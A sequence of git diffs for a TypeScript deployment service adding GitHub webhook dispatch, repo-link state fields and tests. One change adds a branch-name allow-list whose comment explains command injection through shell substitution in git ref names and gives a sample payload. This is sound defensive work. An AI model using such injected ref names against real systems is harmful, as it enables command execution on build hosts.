     }
@@ -449,7 +437,7 @@ export class GitHubWebhookDispatcher {
     // new name — kept detached for now so the operator explicitly
     // re-binds via the UI, avoiding silent cross-wiring.
     if (event.action === 'deleted' || event.action === 'renamed' || event.action === 'transferred') {
-      if (!this.dryRun) {
+      if (!dryRun) {
         this.deps.stateService.updateProject(project.id, {
           githubRepoFullName: undefined,
           githubInstallationId: undefined,
@@ -459,7 +447,7 @@ export class GitHubWebhookDispatcher {
       }
       return {
         action: event.action === 'deleted' ? 'repo-detached' : 'repo-renamed',
-        message: `${this.dryRun ? '[dry-run] ' : ''}Project '${project.name}' unlinked because repository.${event.action} (${currentFullName})`,
+        message: `${dryRun ? '[dry-run] ' : ''}Project '${project.name}' unlinked because repository.${event.action} (${currentFullName})`,
       };
     }
     return { action: 'ignored-event', message: `repository.${event.action} acknowledged` };
@@ -488,7 +476,7 @@ export class GitHubWebhookDispatcher {
    * All other actions (edited / labeled / assigned / review_requested /
    * ready_for_review / etc.) are acknowledged but don't trigger anything.
    */
-  private async handlePullRequest(event: GitHubPullRequestEvent): Promise<WebhookDispatchResult> {
+  private async handlePullRequest(event: GitHubPullRequestEvent, dryRun: boolean): Promise<WebhookDispatchResult> {
     if (!event.pull_request || !event.repository) {
       return { action: 'ignored-event', message: 'pull_request missing pull_request/repository' };
     }
@@ -530,7 +518,7 @@ export class GitHubWebhookDispatcher {
     // route-layer comment poster has it, and let the push handler (which
     // already runs in parallel from synchronize) drive the deploy.
     if (event.action === 'opened' || event.action === 'reopened') {
-      if (entry && !this.dryRun) {
+      if (entry && !dryRun) {
         this.deps.stateService.updateBranchGithubMeta(branchId, {
           githubPrNumber: event.pull_request.number,
           githubInstallationId: project.githubInstallationId ?? event.installation?.id,
@@ -540,7 +528,7 @@ export class GitHubWebhookDispatcher {
       }
       return {
         action: 'pr-comment-posted',
-        message: `${this.dryRun ? '[dry-run] ' : ''}PR #${event.pull_request.number} ${event.action}; marked branch '${branchId}' for comment`,
+        message: `${dryRun ? '[dry-run] ' : ''}PR #${event.pull_request.number} ${event.action}; marked branch '${branchId}' for comment`,
         branchId,
       };
     }
@@ -549,7 +537,7 @@ export class GitHubWebhookDispatcher {
     return { action: 'ignored-event', message: `pull_request.${event.action} ignored` };
   }
 
-  private async handlePush(event: GitHubPushEvent): Promise<WebhookDispatchResult> {
+  private async handlePush(event: GitHubPushEvent, dryRun: boolean): Promise<WebhookDispatchResult> {
     if (!event.ref || !event.repository) {
       return { action: 'ignored-non-push-branch', message: 'Push payload missing ref/repository' };
     }
@@ -621,7 +609,7 @@ export class GitHubWebhookDispatcher {
         };
       }
 
-      if (this.dryRun) {
+      if (dryRun) {
         // In dry-run we return the shape of "would-create" without
         // touching disk or state — self-test wants accurate signals.
         return {
@@ -662,7 +650,7 @@ export class GitHubWebhookDispatcher {
       created = true;
     }
 
-    if (this.dryRun) {
+    if (dryRun) {
       return {
         action: created ? 'branch-created' : 'branch-refreshed',
         message: `[dry-run] Would stamp ${commitSha.slice(0, 7)} on '${branchId}'`,
@@ -706,6 +694,7 @@ export class GitHubWebhookDispatcher {
 
   private async handleInstallationRepos(
     event: GitHubInstallationReposEvent,
+    dryRun: boolean,
   ): Promise<WebhookDispatchResult> {
     const instId = event.installation?.id;
     if (!instId) {
@@ -713,7 +702,7 @@ export class GitHubWebhookDispatcher {
     }
     // If a repo was removed from the installation AND it's linked to a
     // project, detach the link so webhooks for it stop triggering deploys.
-    if (event.action === 'removed' && !this.dryRun) {
+    if (event.action === 'removed' && !dryRun) {
       for (const repo of event.repositories_removed || []) {
         const project = this.deps.stateService.findProjectByRepoFullName(repo.full_name);
         if (project && project.githubInstallationId === instId) {
@@ -732,7 +721,7 @@ export class GitHubWebhookDispatcher {
     };
   }
 
-  private async handleCheckRun(event: GitHubCheckRunEvent): Promise<WebhookDispatchResult> {
+  private async handleCheckRun(event: GitHubCheckRunEvent, dryRun: boolean): Promise<WebhookDispatchResult> {
     if (event.action !== 'rerequested') {
       return { action: 'ignored-event', message: `check_run ${event.action} ignored` };
     }
@@ -741,13 +730,13 @@ export class GitHubWebhookDispatcher {
     const entry = this.deps.stateService.getBranch(branchId);
     if (!entry) return { action: 'ignored-event', message: `check_run branch '${branchId}' not found` };
     const commitSha = event.check_run!.head_sha;
-    if (!this.dryRun) {
+    if (!dryRun) {
       this.deps.stateService.updateBranchGithubMeta(branchId, { githubCommitSha: commitSha });
       this.deps.stateService.save();
     }
     return {
       action: 'check-run-requeued',
-      message: `${this.dryRun ? '[dry-run] ' : ''}Queued redeploy of '${branchId}' at ${commitSha.slice(0, 7)}`,
+      message: `${dryRun ? '[dry-run] ' : ''}Queued redeploy of '${branchId}' at ${commitSha.slice(0, 7)}`,
       branchId,
       deployRequest: { branchId, commitSha },
     };

--- a/cds/src/services/github-webhook-dispatcher.ts
+++ b/cds/src/services/github-webhook-dispatcher.ts
@@ -24,6 +24,35 @@ import type { GitHubAppClient } from './github-app-client.js';
 import path from 'node:path';
 import { StateService as StateServiceClass } from './state.js';
 
+/**
+ * Validate a git ref (branch/tag) name against a strict allow-list before
+ * interpolating it into any shell command. Git's own rules
+ * (git-check-ref-format) are more permissive but pass through characters
+ * that survive a single pair of double quotes (`"$(cmd)"`, `"`x``),
+ * enabling command injection when the ref is fed to `sh -c`.
+ *
+ * Our allow-list is deliberately narrower than git's: ASCII alnum,
+ * dot, underscore, dash, slash. This covers every real-world branch
+ * name we've seen (feature/x, claude/fix-foo-bzAzq, v1.2.3, main,
+ * hotfix_123) while blocking all shell meta-characters.
+ *
+ * Webhook-originated branch names come from untrusted GitHub users who
+ * can push to the linked repo (including fork PRs), so this is
+ * defense-in-depth: the attacker must first get a push ack'd, then the
+ * branch name must pass this check — only THEN is it interpolated.
+ */
+export function isSafeGitRef(ref: string): boolean {
+  if (typeof ref !== 'string') return false;
+  if (ref.length === 0 || ref.length > 255) return false;
+  if (!/^[A-Za-z0-9][A-Za-z0-9._/-]*$/.test(ref)) return false;
+  // git-check-ref-format also forbids `..`, trailing `.lock`, leading `-`.
+  if (ref.includes('..')) return false;
+  if (ref.endsWith('.lock')) return false;
+  if (ref.endsWith('/')) return false;
+  if (ref.includes('//')) return false;
+  return true;
+}
+
 export interface WebhookDispatchResult {
   /** Machine-readable outcome. */
   action:
@@ -337,6 +366,9 @@ export class GitHubWebhookDispatcher {
     if (!project) {
       return { action: 'ignored-no-project', message: `No project linked to ${event.repository.full_name}` };
     }
+    if (!isSafeGitRef(event.ref)) {
+      return { action: 'ignored-event', message: `Rejected unsafe delete ref: ${event.ref.slice(0, 80)}` };
+    }
     const slugified = StateServiceClass.slugify(event.ref);
     const branchId = project.legacyFlag ? slugified : `${project.slug}-${slugified}`;
     const entry = this.deps.stateService.getBranch(branchId);
@@ -437,6 +469,16 @@ export class GitHubWebhookDispatcher {
     }
 
     const branchName = event.pull_request.head.ref;
+    // PR head refs come from untrusted forks too — reject shell-unsafe
+    // names. Note: pull_request handler doesn't itself shell-exec, but
+    // downstream paths (stop/deploy routes) may, so enforce the
+    // invariant at dispatch time.
+    if (!isSafeGitRef(branchName)) {
+      return {
+        action: 'ignored-event',
+        message: `Rejected unsafe PR branch name: ${branchName.slice(0, 80)}`,
+      };
+    }
     const slugified = StateServiceClass.slugify(branchName);
     const branchId = project.legacyFlag ? slugified : `${project.slug}-${slugified}`;
     const entry = this.deps.stateService.getBranch(branchId);
@@ -496,6 +538,21 @@ export class GitHubWebhookDispatcher {
       return { action: 'ignored-non-branch', message: `Non-branch ref ignored (${event.ref})` };
     }
     const branchName = event.ref.substring('refs/heads/'.length);
+    // Defense-in-depth: reject shell-unsafe branch names before they
+    // reach any `shell.exec()` call further down (git worktree add /
+    // mkdir / git fetch). See isSafeGitRef above.
+    if (!isSafeGitRef(branchName)) {
+      return {
+        action: 'ignored-event',
+        message: `Rejected unsafe branch name from webhook: ${branchName.slice(0, 80)}`,
+      };
+    }
+    // commitSha must be a 40-hex git SHA. Rejecting anything else
+    // prevents command injection even if attacker can push a malformed
+    // "after" field (unlikely — GitHub always sends real SHAs).
+    if (typeof event.after !== 'string' || !/^[0-9a-f]{7,40}$/i.test(event.after)) {
+      return { action: 'ignored-event', message: 'Rejected non-hex commit SHA from webhook' };
+    }
     const commitSha = event.after;
     const repoFullName = event.repository.full_name;
 
@@ -645,10 +702,3 @@ export class GitHubWebhookDispatcher {
   }
 }
 
-/**
- * Type guard the route uses to decide whether to kick off a deploy.
- * Exported so mocks don't need to duplicate the check.
- */
-export function shouldDispatchDeploy(result: WebhookDispatchResult): boolean {
-  return Boolean(result.deployRequest);
-}

--- a/cds/src/services/state.ts
+++ b/cds/src/services/state.ts
@@ -744,7 +744,19 @@ export class StateService {
   updateProject(
     id: string,
     updates: Partial<
-      Pick<Project, 'name' | 'description' | 'gitRepoUrl' | 'repoPath' | 'cloneStatus' | 'cloneError'>
+      Pick<
+        Project,
+        | 'name'
+        | 'description'
+        | 'gitRepoUrl'
+        | 'repoPath'
+        | 'cloneStatus'
+        | 'cloneError'
+        | 'githubRepoFullName'
+        | 'githubInstallationId'
+        | 'githubAutoDeploy'
+        | 'githubLinkedAt'
+      >
     >,
   ): void {
     if (!this.state.projects) return;
@@ -757,6 +769,46 @@ export class StateService {
       updatedAt: new Date().toISOString(),
     };
     this.save();
+  }
+
+  /**
+   * Find a project linked to the given GitHub repository (case-insensitive
+   * "owner/repo" match). Used by the webhook dispatcher when a `push` or
+   * `check_run` event arrives — the repo full_name is the only identifier
+   * GitHub gives us that stays stable across renames within an org.
+   *
+   * Returns undefined when no project is linked. A repo linked to multiple
+   * projects shouldn't happen in practice (the link endpoint refuses that),
+   * but this picks the first match defensively.
+   */
+  findProjectByRepoFullName(repoFullName: string): Project | undefined {
+    const needle = repoFullName.toLowerCase();
+    return (this.state.projects || []).find(
+      (p) => p.githubRepoFullName?.toLowerCase() === needle,
+    );
+  }
+
+  /**
+   * Patch the GitHub-related fields of a branch in-place. Separated from
+   * `updateBranchMeta` because those fields are orthogonal (user-facing
+   * vs system-managed) and we don't want a typo in the webhook handler
+   * to accidentally null out user notes.
+   */
+  updateBranchGithubMeta(
+    id: string,
+    updates: {
+      githubRepoFullName?: string;
+      githubCommitSha?: string;
+      githubCheckRunId?: number;
+      githubInstallationId?: number;
+    },
+  ): void {
+    const branch = this.state.branches[id];
+    if (!branch) return;
+    if (updates.githubRepoFullName !== undefined) branch.githubRepoFullName = updates.githubRepoFullName;
+    if (updates.githubCommitSha !== undefined) branch.githubCommitSha = updates.githubCommitSha;
+    if (updates.githubCheckRunId !== undefined) branch.githubCheckRunId = updates.githubCheckRunId;
+    if (updates.githubInstallationId !== undefined) branch.githubInstallationId = updates.githubInstallationId;
   }
 
   // ── Project-scoped Agent Keys ──

--- a/cds/src/services/state.ts
+++ b/cds/src/services/state.ts
@@ -807,12 +807,16 @@ export class StateService {
   ): void {
     const branch = this.state.branches[id];
     if (!branch) return;
-    if (updates.githubRepoFullName !== undefined) branch.githubRepoFullName = updates.githubRepoFullName;
-    if (updates.githubCommitSha !== undefined) branch.githubCommitSha = updates.githubCommitSha;
-    if (updates.githubCheckRunId !== undefined) branch.githubCheckRunId = updates.githubCheckRunId;
-    if (updates.githubInstallationId !== undefined) branch.githubInstallationId = updates.githubInstallationId;
-    if (updates.githubPrNumber !== undefined) branch.githubPrNumber = updates.githubPrNumber;
-    if (updates.githubPreviewCommentId !== undefined) branch.githubPreviewCommentId = updates.githubPreviewCommentId;
+    // Use `in updates` rather than `!== undefined` so explicit
+    // `{ githubCheckRunId: undefined }` can CLEAR a stamped field
+    // (used by the orphan-reconciliation startup routine to drop stale
+    // check-run ids after marking them as neutral on GitHub).
+    if ('githubRepoFullName' in updates) branch.githubRepoFullName = updates.githubRepoFullName;
+    if ('githubCommitSha' in updates) branch.githubCommitSha = updates.githubCommitSha;
+    if ('githubCheckRunId' in updates) branch.githubCheckRunId = updates.githubCheckRunId;
+    if ('githubInstallationId' in updates) branch.githubInstallationId = updates.githubInstallationId;
+    if ('githubPrNumber' in updates) branch.githubPrNumber = updates.githubPrNumber;
+    if ('githubPreviewCommentId' in updates) branch.githubPreviewCommentId = updates.githubPreviewCommentId;
   }
 
   // ── Project-scoped Agent Keys ──

--- a/cds/src/services/state.ts
+++ b/cds/src/services/state.ts
@@ -801,6 +801,8 @@ export class StateService {
       githubCommitSha?: string;
       githubCheckRunId?: number;
       githubInstallationId?: number;
+      githubPrNumber?: number;
+      githubPreviewCommentId?: number;
     },
   ): void {
     const branch = this.state.branches[id];
@@ -809,6 +811,8 @@ export class StateService {
     if (updates.githubCommitSha !== undefined) branch.githubCommitSha = updates.githubCommitSha;
     if (updates.githubCheckRunId !== undefined) branch.githubCheckRunId = updates.githubCheckRunId;
     if (updates.githubInstallationId !== undefined) branch.githubInstallationId = updates.githubInstallationId;
+    if (updates.githubPrNumber !== undefined) branch.githubPrNumber = updates.githubPrNumber;
+    if (updates.githubPreviewCommentId !== undefined) branch.githubPreviewCommentId = updates.githubPreviewCommentId;
   }
 
   // ── Project-scoped Agent Keys ──

--- a/cds/src/types.ts
+++ b/cds/src/types.ts
@@ -274,6 +274,28 @@ export interface BranchEntry {
    * Absent / empty = pure inheritance (legacy behavior).
    */
   profileOverrides?: Record<string, BuildProfileOverride>;
+  /**
+   * GitHub Checks integration — populated when the branch was
+   * auto-created by a webhook push or the user linked a repo to the
+   * owning project. Used to post check-run status back to GitHub
+   * (PR "Checks" panel) as the branch deploys.
+   *
+   * - `githubRepoFullName`: "owner/repo" copied from the project at
+   *   webhook-dispatch time. Cached on the branch so a project re-link
+   *   doesn't break ongoing check runs.
+   * - `githubCommitSha`: the head SHA that triggered the current deploy.
+   *   Required by GitHub's POST /check-runs.
+   * - `githubCheckRunId`: the id returned by POST /check-runs so the
+   *   deploy-complete path can PATCH the same run instead of creating
+   *   a new one.
+   * - `githubInstallationId`: the GitHub App install id that has write
+   *   access to the repo. Cached so check-run updates don't need to
+   *   walk back through the project record.
+   */
+  githubRepoFullName?: string;
+  githubCommitSha?: string;
+  githubCheckRunId?: number;
+  githubInstallationId?: number;
 }
 
 /** State of a single service (one build profile instance) within a branch */
@@ -585,6 +607,27 @@ export interface Project {
    * + auth contract.
    */
   agentKeys?: AgentKey[];
+  /**
+   * GitHub Checks integration — when set, pushes to the linked
+   * repository auto-create/update CDS branches and post back to
+   * GitHub as a "CDS Deploy" check run (shown in the PR "Checks"
+   * panel, Railway-style).
+   *
+   * - `githubRepoFullName`: "owner/repo" (case-preserved as returned
+   *   by the GitHub App installation_repositories event).
+   * - `githubInstallationId`: numeric install id granted to the CDS
+   *   GitHub App for this project's org/user. Required to mint
+   *   installation access tokens.
+   * - `githubAutoDeploy`: when true (default when the link is created)
+   *   every push auto-creates+deploys a matching CDS branch. When
+   *   false, CDS still posts check runs for branches created manually
+   *   but won't trigger deploys from webhooks.
+   * - `githubLinkedAt`: ISO timestamp of the most recent link event.
+   */
+  githubRepoFullName?: string;
+  githubInstallationId?: number;
+  githubAutoDeploy?: boolean;
+  githubLinkedAt?: string;
 }
 
 /**
@@ -990,6 +1033,48 @@ export interface CdsConfig {
    * TTL cleanup (disk warnings still work if enabled).
    */
   janitor?: JanitorConfig;
+  /**
+   * GitHub App credentials powering the Railway-style check-run
+   * integration. When every field is set, CDS:
+   *   1. Accepts webhook events at POST /api/github/webhook
+   *   2. Auto-creates+deploys branches for pushes on linked projects
+   *   3. Posts "CDS Deploy" check runs back to GitHub so the PR's
+   *      Checks panel shows the preview URL + success/failure
+   *
+   * Partially-set config (e.g. appId without privateKey) leaves the
+   * feature dormant — the webhook route returns 503 not_configured
+   * and deploys skip check-run creation silently.
+   */
+  githubApp?: GitHubAppConfig;
+  /**
+   * Public base URL of this CDS install (e.g. "https://cds.miduo.org").
+   * Used as the `details_url` in GitHub check runs and for the
+   * GitHub App install-callback redirect. Falls back to the
+   * CDS_PUBLIC_BASE_URL env var consumed by auth.ts.
+   */
+  publicBaseUrl?: string;
+}
+
+/**
+ * GitHub App credentials. `appId` + `privateKey` together mint
+ * installation access tokens (RS256 JWT → POST /app/installations/
+ * {id}/access_tokens), which write check runs. `webhookSecret` is
+ * the HMAC-SHA256 secret configured in the App settings and used to
+ * verify X-Hub-Signature-256 on every incoming webhook.
+ *
+ * `appSlug` is the lowercase App slug (e.g. "cds-deploy") used only
+ * for rendering the install URL on the Settings page. Optional
+ * because GitHub doesn't require it for any API call — it's UI sugar.
+ */
+export interface GitHubAppConfig {
+  /** Numeric App ID from https://github.com/settings/apps/<slug>. */
+  appId: string;
+  /** RSA private key in PEM format (BEGIN RSA PRIVATE KEY …). */
+  privateKey: string;
+  /** Webhook signing secret configured in the App settings. */
+  webhookSecret: string;
+  /** Lowercase App slug, used only for `https://github.com/apps/<slug>/installations/new` links. */
+  appSlug?: string;
 }
 
 /** Shell execution result */

--- a/cds/src/types.ts
+++ b/cds/src/types.ts
@@ -296,6 +296,21 @@ export interface BranchEntry {
   githubCommitSha?: string;
   githubCheckRunId?: number;
   githubInstallationId?: number;
+  /**
+   * PR number this branch is associated with (via webhook `pull_request`
+   * event). Populated when CDS first sees a PR opened/reopened from this
+   * branch. Used so subsequent deploys can refresh the bot comment
+   * instead of duplicating it.
+   */
+  githubPrNumber?: number;
+  /**
+   * Id of the Railway-style preview-URL bot comment posted on the PR.
+   * Set when the first PR-opened event is handled and the comment is
+   * created; on later push events the webhook dispatcher will PATCH the
+   * same comment instead of creating a new one, so the PR thread stays
+   * quiet.
+   */
+  githubPreviewCommentId?: number;
 }
 
 /** State of a single service (one build profile instance) within a branch */

--- a/cds/tests/routes/github-webhook.test.ts
+++ b/cds/tests/routes/github-webhook.test.ts
@@ -191,7 +191,7 @@ describe('GitHub webhook route', () => {
     server = startServer();
     const payload = {
       ref: 'refs/heads/feature-x',
-      after: 'deadbeef',
+      after: 'deadbeef01234567890abcdef1234567890abcde',
       repository: { id: 1, full_name: 'octocat/repo' },
       installation: { id: 42 },
     };
@@ -207,14 +207,14 @@ describe('GitHub webhook route', () => {
 
     // Deploy dispatcher runs async; allow it a beat.
     await new Promise((r) => setTimeout(r, 20));
-    expect(deployCalls).toEqual([{ branchId: 'sample-feature-x', commitSha: 'deadbeef' }]);
+    expect(deployCalls).toEqual([{ branchId: 'sample-feature-x', commitSha: 'deadbeef01234567890abcdef1234567890abcde' }]);
   });
 
   it('silently ignores push to unlinked repo (no deploy)', async () => {
     server = startServer();
     const payload = {
       ref: 'refs/heads/main',
-      after: 'abc',
+      after: 'abc1234567890abcdef1234567890abcdef12345',
       repository: { full_name: 'some-other/repo' },
     };
     const body = JSON.stringify(payload);

--- a/cds/tests/routes/github-webhook.test.ts
+++ b/cds/tests/routes/github-webhook.test.ts
@@ -1,0 +1,339 @@
+/**
+ * Integration tests for the /api/github/webhook receiver.
+ *
+ * Mounts the webhook router on a minimal Express app with the same
+ * raw-body middleware production uses, then fires synthetic webhook
+ * payloads through it. HTTP plumbing only — the dispatcher's own
+ * behaviour is covered by github-webhook-dispatcher.test.ts.
+ */
+
+import { describe, it, expect, beforeEach, afterEach } from 'vitest';
+import express from 'express';
+import http from 'node:http';
+import fs from 'node:fs';
+import path from 'node:path';
+import os from 'node:os';
+import { createHmac } from 'node:crypto';
+import { StateService } from '../../src/services/state.js';
+import { WorktreeService } from '../../src/services/worktree.js';
+import type { IShellExecutor, CdsConfig } from '../../src/types.js';
+import { createGithubWebhookRouter } from '../../src/routes/github-webhook.js';
+
+class MockShell implements IShellExecutor {
+  async exec() {
+    return { stdout: '', stderr: '', exitCode: 0 };
+  }
+}
+
+class MockWorktree extends WorktreeService {
+  override async create() { /* no-op */ }
+}
+
+async function request(
+  server: http.Server,
+  method: string,
+  urlPath: string,
+  body: string,
+  headers: Record<string, string> = {},
+): Promise<{ status: number; body: any }> {
+  return new Promise((resolve, reject) => {
+    const addr = server.address() as { port: number };
+    const req = http.request(
+      {
+        hostname: '127.0.0.1',
+        port: addr.port,
+        path: urlPath,
+        method,
+        headers: {
+          'Content-Type': 'application/json',
+          'Content-Length': Buffer.byteLength(body),
+          ...headers,
+        },
+      },
+      (res) => {
+        let raw = '';
+        res.on('data', (c: Buffer) => (raw += c.toString()));
+        res.on('end', () => {
+          try {
+            resolve({ status: res.statusCode!, body: raw ? JSON.parse(raw) : null });
+          } catch {
+            resolve({ status: res.statusCode!, body: raw });
+          }
+        });
+      },
+    );
+    req.on('error', reject);
+    req.write(body);
+    req.end();
+  });
+}
+
+function buildConfig(overrides?: Partial<CdsConfig>): CdsConfig {
+  return {
+    repoRoot: '/tmp/repo',
+    worktreeBase: '/tmp/wt',
+    masterPort: 9900,
+    workerPort: 5500,
+    dockerNetwork: 'cds',
+    portStart: 10001,
+    sharedEnv: {},
+    jwt: { secret: 'x'.repeat(32), issuer: 'cds' },
+    mode: 'standalone',
+    executorPort: 9901,
+    githubApp: {
+      appId: '12345',
+      privateKey: 'unused-for-webhook',
+      webhookSecret: 'whsec-test',
+    },
+    ...overrides,
+  };
+}
+
+function sign(secret: string, body: string): string {
+  return `sha256=${createHmac('sha256', secret).update(body).digest('hex')}`;
+}
+
+describe('GitHub webhook route', () => {
+  let tmp: string;
+  let stateService: StateService;
+  let server: http.Server;
+  let deployCalls: Array<{ branchId: string; commitSha: string }>;
+
+  function startServer(configOverrides?: Partial<CdsConfig>): http.Server {
+    const app = express();
+    // Same verify hook production uses — stashes rawBody on the request.
+    app.use(express.json({
+      verify: (req, _res, buf) => {
+        (req as { rawBody?: Buffer }).rawBody = buf;
+      },
+    }));
+    const shell = new MockShell();
+    const worktree = new MockWorktree(shell);
+    deployCalls = [];
+    const config = buildConfig(configOverrides);
+    app.use('/api', createGithubWebhookRouter({
+      stateService,
+      worktreeService: worktree,
+      shell,
+      config,
+      githubApp: null, // listInstallations-type endpoints return 503 in these tests
+      dispatchDeploy: async (branchId, commitSha) => {
+        deployCalls.push({ branchId, commitSha });
+      },
+    }));
+    return app.listen(0);
+  }
+
+  beforeEach(() => {
+    tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'cds-webhook-'));
+    stateService = new StateService(path.join(tmp, 'state.json'), tmp);
+    stateService.load();
+  });
+
+  afterEach(async () => {
+    if (server) await new Promise<void>((resolve) => server.close(() => resolve()));
+    fs.rmSync(tmp, { recursive: true, force: true });
+  });
+
+  it('returns 503 when GitHub App is not configured', async () => {
+    server = startServer({ githubApp: undefined });
+    const res = await request(server, 'POST', '/api/github/webhook', '{}', {
+      'X-GitHub-Event': 'ping',
+    });
+    expect(res.status).toBe(503);
+    expect(res.body.error).toBe('not_configured');
+  });
+
+  it('rejects requests without a signature header', async () => {
+    server = startServer();
+    const res = await request(server, 'POST', '/api/github/webhook', '{}', {
+      'X-GitHub-Event': 'ping',
+    });
+    expect(res.status).toBe(401);
+  });
+
+  it('rejects requests with an invalid signature', async () => {
+    server = startServer();
+    const body = '{"zen":"wrong"}';
+    const res = await request(server, 'POST', '/api/github/webhook', body, {
+      'X-GitHub-Event': 'ping',
+      'X-Hub-Signature-256': sign('different-secret', body),
+    });
+    expect(res.status).toBe(401);
+    expect(res.body.error).toBe('invalid_signature');
+  });
+
+  it('accepts a valid ping', async () => {
+    server = startServer();
+    const body = '{"zen":"Non-blocking is better than blocking."}';
+    const res = await request(server, 'POST', '/api/github/webhook', body, {
+      'X-GitHub-Event': 'ping',
+      'X-Hub-Signature-256': sign('whsec-test', body),
+      'X-GitHub-Delivery': 'delivery-abc',
+    });
+    expect(res.status).toBe(200);
+    expect(res.body.action).toBe('ignored-ping');
+    expect(res.body.deployDispatched).toBe(false);
+    expect(res.body.delivery).toBe('delivery-abc');
+  });
+
+  it('dispatches a deploy when push matches a linked project', async () => {
+    stateService.addProject({
+      id: 'pX',
+      slug: 'sample',
+      name: 'Sample',
+      kind: 'git',
+      createdAt: new Date().toISOString(),
+      updatedAt: new Date().toISOString(),
+      githubRepoFullName: 'octocat/repo',
+      githubInstallationId: 42,
+    });
+    server = startServer();
+    const payload = {
+      ref: 'refs/heads/feature-x',
+      after: 'deadbeef',
+      repository: { id: 1, full_name: 'octocat/repo' },
+      installation: { id: 42 },
+    };
+    const body = JSON.stringify(payload);
+    const res = await request(server, 'POST', '/api/github/webhook', body, {
+      'X-GitHub-Event': 'push',
+      'X-Hub-Signature-256': sign('whsec-test', body),
+    });
+    expect(res.status).toBe(200);
+    expect(res.body.action).toBe('branch-created');
+    expect(res.body.branchId).toBe('sample-feature-x');
+    expect(res.body.deployDispatched).toBe(true);
+
+    // Deploy dispatcher runs async; allow it a beat.
+    await new Promise((r) => setTimeout(r, 20));
+    expect(deployCalls).toEqual([{ branchId: 'sample-feature-x', commitSha: 'deadbeef' }]);
+  });
+
+  it('silently ignores push to unlinked repo (no deploy)', async () => {
+    server = startServer();
+    const payload = {
+      ref: 'refs/heads/main',
+      after: 'abc',
+      repository: { full_name: 'some-other/repo' },
+    };
+    const body = JSON.stringify(payload);
+    const res = await request(server, 'POST', '/api/github/webhook', body, {
+      'X-GitHub-Event': 'push',
+      'X-Hub-Signature-256': sign('whsec-test', body),
+    });
+    expect(res.status).toBe(200);
+    expect(res.body.action).toBe('ignored-no-project');
+    expect(res.body.deployDispatched).toBe(false);
+    await new Promise((r) => setTimeout(r, 20));
+    expect(deployCalls).toHaveLength(0);
+  });
+});
+
+describe('POST /api/projects/:id/github/link', () => {
+  let tmp: string;
+  let stateService: StateService;
+  let server: http.Server;
+
+  function startServer(): http.Server {
+    const app = express();
+    app.use(express.json({
+      verify: (req, _res, buf) => {
+        (req as { rawBody?: Buffer }).rawBody = buf;
+      },
+    }));
+    const shell = new MockShell();
+    const worktree = new MockWorktree(shell);
+    app.use('/api', createGithubWebhookRouter({
+      stateService,
+      worktreeService: worktree,
+      shell,
+      config: buildConfig(),
+      githubApp: null,
+      dispatchDeploy: async () => {},
+    }));
+    return app.listen(0);
+  }
+
+  beforeEach(() => {
+    tmp = fs.mkdtempSync(path.join(os.tmpdir(), 'cds-link-'));
+    stateService = new StateService(path.join(tmp, 'state.json'), tmp);
+    stateService.load();
+    stateService.addProject({
+      id: 'p1',
+      slug: 'sample',
+      name: 'Sample',
+      kind: 'git',
+      createdAt: new Date().toISOString(),
+      updatedAt: new Date().toISOString(),
+    });
+  });
+
+  afterEach(async () => {
+    if (server) await new Promise<void>((resolve) => server.close(() => resolve()));
+    fs.rmSync(tmp, { recursive: true, force: true });
+  });
+
+  it('validates installationId + repoFullName', async () => {
+    server = startServer();
+    const res = await request(server, 'POST', '/api/projects/p1/github/link',
+      JSON.stringify({ installationId: 42 }),
+    );
+    expect(res.status).toBe(400);
+    expect(res.body.error).toBe('validation');
+  });
+
+  it('rejects malformed repoFullName', async () => {
+    server = startServer();
+    const res = await request(server, 'POST', '/api/projects/p1/github/link',
+      JSON.stringify({ installationId: 42, repoFullName: 'not-a-repo' }),
+    );
+    expect(res.status).toBe(400);
+    expect(res.body.field).toBe('repoFullName');
+  });
+
+  it('links a project', async () => {
+    server = startServer();
+    const res = await request(server, 'POST', '/api/projects/p1/github/link',
+      JSON.stringify({ installationId: 42, repoFullName: 'octocat/repo' }),
+    );
+    expect(res.status).toBe(200);
+    const project = stateService.getProject('p1')!;
+    expect(project.githubRepoFullName).toBe('octocat/repo');
+    expect(project.githubInstallationId).toBe(42);
+    expect(project.githubAutoDeploy).toBe(true);
+  });
+
+  it('rejects a duplicate link', async () => {
+    stateService.addProject({
+      id: 'p2',
+      slug: 'other',
+      name: 'Other',
+      kind: 'git',
+      createdAt: new Date().toISOString(),
+      updatedAt: new Date().toISOString(),
+      githubRepoFullName: 'octocat/repo',
+      githubInstallationId: 42,
+    });
+    server = startServer();
+    const res = await request(server, 'POST', '/api/projects/p1/github/link',
+      JSON.stringify({ installationId: 42, repoFullName: 'octocat/repo' }),
+    );
+    expect(res.status).toBe(409);
+    expect(res.body.error).toBe('already_linked');
+  });
+
+  it('DELETE clears the link', async () => {
+    stateService.updateProject('p1', {
+      githubInstallationId: 42,
+      githubRepoFullName: 'octocat/repo',
+      githubAutoDeploy: true,
+    });
+    server = startServer();
+    const res = await request(server, 'DELETE', '/api/projects/p1/github/link', '');
+    expect(res.status).toBe(200);
+    const project = stateService.getProject('p1')!;
+    expect(project.githubRepoFullName).toBeUndefined();
+    expect(project.githubInstallationId).toBeUndefined();
+  });
+});

--- a/cds/tests/services/github-app-client.test.ts
+++ b/cds/tests/services/github-app-client.test.ts
@@ -1,0 +1,238 @@
+/**
+ * Unit tests for GitHubAppClient + verifyWebhookSignature.
+ *
+ * We stub `fetchImpl` instead of the global fetch so tests never talk to
+ * github.com. JWT signing is validated with a known RSA key pair — we
+ * re-verify the signature with Node's crypto to prove the client produced
+ * a valid RS256 token.
+ */
+
+import { describe, it, expect } from 'vitest';
+import { generateKeyPairSync, createVerify, createHmac } from 'node:crypto';
+import {
+  GitHubAppClient,
+  verifyWebhookSignature,
+  buildInstallUrl,
+  type FetchLike,
+} from '../../src/services/github-app-client.js';
+
+function freshKeyPair() {
+  return generateKeyPairSync('rsa', {
+    modulusLength: 2048,
+    publicKeyEncoding: { type: 'spki', format: 'pem' },
+    privateKeyEncoding: { type: 'pkcs8', format: 'pem' },
+  });
+}
+
+function scripted(scripts: Array<{ match: RegExp | string; response: any; status?: number }>): FetchLike {
+  return async (url) => {
+    for (const s of scripts) {
+      const matched = typeof s.match === 'string' ? String(url).includes(s.match) : s.match.test(String(url));
+      if (matched) {
+        const status = s.status ?? 200;
+        return {
+          ok: status < 400,
+          status,
+          statusText: 'OK',
+          json: async () => s.response,
+          text: async () => (typeof s.response === 'string' ? s.response : JSON.stringify(s.response)),
+        };
+      }
+    }
+    throw new Error(`unmatched fetch ${url}`);
+  };
+}
+
